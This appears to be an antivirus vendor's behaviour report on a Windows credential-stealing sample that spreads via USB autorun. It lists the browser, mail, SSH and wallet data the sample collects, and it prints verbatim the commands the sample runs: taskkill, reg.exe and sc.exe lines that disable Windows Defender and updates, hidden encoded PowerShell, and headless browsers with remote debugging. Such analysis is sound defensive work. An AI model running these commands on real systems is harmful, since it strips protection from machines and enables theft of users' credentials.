Technical Information
To ensure autorun and distribution
Creates the following files on removable media
- <Drive name for removable media>:\usb_drivers_update.exe
- <Drive name for removable media>:\open files.lnk
- <Drive name for removable media>:\system volume information.lnk
- <Drive name for removable media>:\autorun.inf
- <Drive name for removable media>:\desktop.ini
Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
- Windows Update
- Windows Defender
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAUwBlA...
Executes the following
- '<SYSTEM32>\taskkill.exe' /f /im MsMpEng.exe
- '<SYSTEM32>\taskkill.exe' /f /im SecurityHealthService.exe
Patches code
in AMSI dll
- fufj.exe process, Amsi.dll module
in NTDLL dll
- fufj.exe process, ntdll.dll module
Searches for registry branches where third party applications store passwords
- [HKCU\Software\Martin Prikryl\WinSCP 2\Sessions]
- [HKCU\Software\SimonTatham\PuTTY\Sessions]
Reads files which store third party applications passwords
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %LOCALAPPDATA%\microsoft\edge\user data\default\login data
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %LOCALAPPDATA%\microsoft\edge\user data\default\web data
Modifies file system
Creates the following files
- %TEMP%\sc_efdd1705bdbd453f8623a5ff59a9d703.jpg
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\ssh_ftp_vpn\thunderbird\gbmwccb6.default-release\key4.db
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\ssh_ftp_vpn\thunderbird\gbmwccb6.default-release\cert9.db
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\ssh_ftp_vpn\thunderbird\gbmwccb6.default-release\prefs.js
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\firefox\dnyauhh1.default-release\key4.db
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\firefox\dnyauhh1.default-release\cert9.db
- %TEMP%\cbd5beee4d264b29a4dfee3201b95acb\cookies.sqlite
- %TEMP%\cbd5beee4d264b29a4dfee3201b95acb\cookies.sqlite-shm
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\firefox\dnyauhh1.default-release\places.sqlite
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\firefox\dnyauhh1.default-release\recovery.jsonlz4
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\email\outlook\profiles.txt
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\email\thunderbird\gbmwccb6.default-release\key4.db
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\email\thunderbird\gbmwccb6.default-release\cert9.db
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\email\thunderbird\gbmwccb6.default-release\prefs.js
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\email\thunderbird\gbmwccb6.default-release\places.sqlite
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\seedphrases\match_0_recovery.baklz4
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\seedphrases\original_1_recovery.baklz4
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\seedphrases\match_1_recovery.jsonlz4
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\seedphrases\original_2_recovery.jsonlz4
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\seedphrases\_summary.txt
- %TEMP%\02469211e23f4a64b01813af5dd177fd\login data
- %TEMP%\15663ce7f4a74ad0a654ba1d4cabe56a\cookies
- %TEMP%\bff6713e5ad747d9b6da32618d62d9bd.dmp
- %TEMP%\cd961dec3e104226b6f9e6d3464efd9a\login data
- %TEMP%\776fc1ab303c44f4af82d53eb57353ce\history
- %TEMP%\dbf20090c7a344b9832ee9517af7c5dd\web data
- %TEMP%\25e0084500bc4cc2a677b71efed1f3d8\web data
- %TEMP%\b7cde8efdaaf49c6b82669323ec85730\history
- %TEMP%\bc690ac70c2b4994ae5bea6fed1fb0af\web data
- %TEMP%\85b10ee4702145e9beb442d8cef2c55f\web data
- %LOCALAPPDATA%\microsoft\edge\user data\devtoolsactiveport
- %LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\index
- %LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\data_0
- %LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\data_2
- %LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\data_3
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\systeminfo.txt
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\browsers\history.txt
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\lsass.dmp
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\screenshot.jpg
- %TEMP%\syshost_user_hhbaud_20260614_201750.zip
- %TEMP%\sc_2e2b0aa027ed4ed190d3899f4f88341a.jpg
Sets the 'hidden' attribute to the following files
- <Drive name for removable media>:\usb_drivers_update.exe
- <Drive name for removable media>:\autorun.inf
- <Drive name for removable media>:\desktop.ini
Deletes following files that it created itself
- %TEMP%\cbd5beee4d264b29a4dfee3201b95acb\cookies.sqlite
- %TEMP%\cbd5beee4d264b29a4dfee3201b95acb\cookies.sqlite-shm
- %TEMP%\02469211e23f4a64b01813af5dd177fd\login data
- %TEMP%\15663ce7f4a74ad0a654ba1d4cabe56a\cookies
- %TEMP%\cd961dec3e104226b6f9e6d3464efd9a\login data
- %TEMP%\776fc1ab303c44f4af82d53eb57353ce\history
- %TEMP%\dbf20090c7a344b9832ee9517af7c5dd\web data
- %TEMP%\25e0084500bc4cc2a677b71efed1f3d8\web data
- %TEMP%\b7cde8efdaaf49c6b82669323ec85730\history
- %TEMP%\bc690ac70c2b4994ae5bea6fed1fb0af\web data
- %TEMP%\85b10ee4702145e9beb442d8cef2c55f\web data
- %TEMP%\sc_2e2b0aa027ed4ed190d3899f4f88341a.jpg
- %TEMP%\syshost_user_hhbaud_20260614_201750.zip
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\browsers\history.txt
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\email\outlook\profiles.txt
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\email\thunderbird\gbmwccb6.default-release\cert9.db
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\email\thunderbird\gbmwccb6.default-release\key4.db
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\email\thunderbird\gbmwccb6.default-release\places.sqlite
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\email\thunderbird\gbmwccb6.default-release\prefs.js
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\firefox\dnyauhh1.default-release\cert9.db
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\firefox\dnyauhh1.default-release\key4.db
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\firefox\dnyauhh1.default-release\places.sqlite
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\firefox\dnyauhh1.default-release\recovery.jsonlz4
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\lsass.dmp
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\screenshot.jpg
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\seedphrases\match_0_recovery.baklz4
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\seedphrases\match_1_recovery.jsonlz4
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\seedphrases\original_1_recovery.baklz4
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\seedphrases\original_2_recovery.jsonlz4
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\seedphrases\_summary.txt
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\ssh_ftp_vpn\thunderbird\gbmwccb6.default-release\cert9.db
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\ssh_ftp_vpn\thunderbird\gbmwccb6.default-release\key4.db
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\ssh_ftp_vpn\thunderbird\gbmwccb6.default-release\prefs.js
- %TEMP%\de0e39f5a6584a3caf7ebac39f6a92e3\systeminfo.txt
- %TEMP%\sc_efdd1705bdbd453f8623a5ff59a9d703.jpg
- %TEMP%\bff6713e5ad747d9b6da32618d62d9bd.dmp
Deletes itself.
Network activity
TCP
HTTP GET requests
Other
- 'localhost':49696
- 'localhost':49697
- 'localhost':49698
UDP
- DNS ASK ap#.##legram.org
Miscellaneous
Searches for the following windows
- ClassName: '' WindowName: ''
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAJgAgA...
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' config WinDefend start= disabled
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' stop WinDefend
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d 0 /f
- '<SYSTEM32>\sc.exe' config SecurityHealthService start= disabled
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ForceDefenderPassiveMode /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' stop SecurityHealthService
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' config Sense start= disabled
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
- '<SYSTEM32>\sc.exe' stop Sense
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
- '<SYSTEM32>\sc.exe' config WdNisSvc start= disabled
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- '<SYSTEM32>\sc.exe' stop WdNisSvc
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f
- '<SYSTEM32>\schtasks.exe' /Change /TN Microsoft\Windows\UpdateOrchestrator\Reboot /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableArchiveScanning /t REG_DWORD /d 1 /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableEmailScanning /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIntrusionPreventionSystem /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
- '<SYSTEM32>\sc.exe' config wuauserv start= disabled
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\sc.exe' config bits start= disabled
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' stop bits
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScheduledScan /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ForceUpdateFromMU /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Network Protection" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v UILockdown /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v EnableSmartScreen /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c netsh wlan show profiles
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v ShellSmartScreenLevel /t REG_SZ /d Off /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /t REG_DWORD /d 1 /f
- '<SYSTEM32>\netsh.exe' wlan show profiles
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --remote-debugging-port=9223 --remote-allow-origins=* --headless=new --no-sandbox --disable-gpu --disable-dev-shm-usage --no-first-run --no-default-browser-check --disable-background-networking...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand cwBjAGgAdABhAHMAawBzACAALwBDAHIAZQBhAHQAZQAgAC8ARgAgAC8AUwBDACAATwBOAEwATwBHAE8ATgAgAC8AUgBMACAATABJAE0ASQBUAEUARAAgA...
- '<SYSTEM32>\schtasks.exe' /Create /F /SC ONLOGON /RL LIMITED /TN WindowsUpdateAgent /TR \ <Full path to file>\ /IT
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBGAG8AcgBjAGUAIAAtA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAJgAgA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAUwBlA...' (with hidden window)
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --remote-debugging-port=9223 --remote-allow-origins=* --headless=new --no-sandbox --disable-gpu --disable-dev-shm-usage --no-first-run --no-default-browser-check --disable-background-networking...' (with hidden window)
- '%LOCALAPPDATA%\google\chrome\application\chrome.exe' --remote-debugging-port=9222 --remote-allow-origins=* --headless=new --no-sandbox --disable-gpu --disable-dev-shm-usage --no-first-run --no-default-browser-check --disable-background-networking...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand cwBjAGgAdABhAHMAawBzACAALwBDAHIAZQBhAHQAZQAgAC8ARgAgAC8AUwBDACAATwBOAEwATwBHAE8ATgAgAC8AUgBMACAATABJAE0ASQBUAEUARAAgA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBGAG8AcgBjAGUAIAAtA...' (with hidden window)